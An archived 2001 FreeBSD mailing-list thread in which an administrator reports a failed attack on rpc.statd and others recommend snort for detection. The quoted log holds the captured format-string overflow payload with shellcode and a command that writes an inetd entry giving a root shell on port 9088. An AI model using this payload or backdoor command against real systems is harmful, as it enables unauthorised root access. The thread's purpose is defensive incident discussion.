Date: Thu, 4 Jan 2001 09:52:45 -0600 (CST) From: Guy Helmer <ghelmer@palisadesys.com> To: Raymond Hicks <rayhicks@UU.NET> Cc: Eric_Stanfield@kenokozie.com, freebsd-questions@FreeBSD.ORG Subject: RE: hack attempt (again) - help Message-ID: <Pine.LNX.4.21.0101040951330.10523-100000@magellan.palisadesys.com> In-Reply-To: <003801c07665$c5b4d170$d7902799@sysenglt112>
next in thread | previous in thread | raw e-mail | index | archive | help
On Thu, 4 Jan 2001, Raymond Hicks wrote: > why dont you just run a sniffer? snort is a sniffer with a lot of good stuff (TM) to find evil things. > -----Original Message----- > From: owner-freebsd-questions@FreeBSD.ORG > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Guy Helmer > Sent: Thursday, January 04, 2001 10:26 AM > To: Eric_Stanfield@kenokozie.com > Cc: freebsd-questions@FreeBSD.ORG > Subject: Re: hack attempt (again) - help >=20 >=20 > On Thu, 4 Jan 2001 Eric_Stanfield@kenokozie.com wrote: >=20 > > Alright this jerkoff has once again attempted to hack one of my freebsd > > machines by trying what I assume is a buffer overflow to rpc: > > > > Jan 3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon: > > ^D=F7=FF=BF^D=F7=FF=BF^E=F7=FF=BF^E=F7=FF=BF^F=F7=FF=BF^F=F7=FF=BF^G=F7= =FF=BF^G=F7=FF=BF%08x %08x %08x %08x %08x %08x %08x > > %08x %08x %08x %08x %08x %08x %08x > > > %0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM- > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM- > ^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^= PM- > ^P=EBK^M- > > > > v=ACM-^C=EE M-^M^(M-^C=C6 M- ^=B0M-^C=EE M-^M^.M-^C=C6 M-^C=C3 M-^C= =EB#M- ^=B41=C0M-^C=EE > > M-^HF'M-^HF*M-^C=C6 M-^HF=ABM- F=B8=B0+, M- =F3M-^MN=ACM-^MV=B8=CD= M-^@1=DBM- > > =D8@=CDM-^@=E8=B0=FF=FF=FF/bin/sh -c echo "9088 stream tcp nowait root = /bin/sh -i" >> > > /tmp/m; /usr/sbin/inetd /tmp/m; > > > > The interesting bit is what he (she?) is attempting to sneak in at the = end > > of the garbage sent to the port. > > > > I've given the system a thorough check and this seems to have been a > second > > failed attempt. I'm now annoyed, however, and would like to be able to= at > > least log what address this stuff is originating from. Can anyone > suggest > > something from the ports that would do the trick? I've disabled nfs/rp= c > > but I'm sure the hacker will come knocking again. >=20 > snort with a current copy of the rule set from > http://www.whitehats.com/ids/index.html ought to detect this (and lots of > other script kiddie attempts). --=20 Guy Helmer, Ph.D. Sr. Software Engineer, Palisade Systems --- ghelmer@palisadesys.c= om http://www.palisadesys.com/~ghelmer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.LNX.4.21.0101040951330.10523-100000>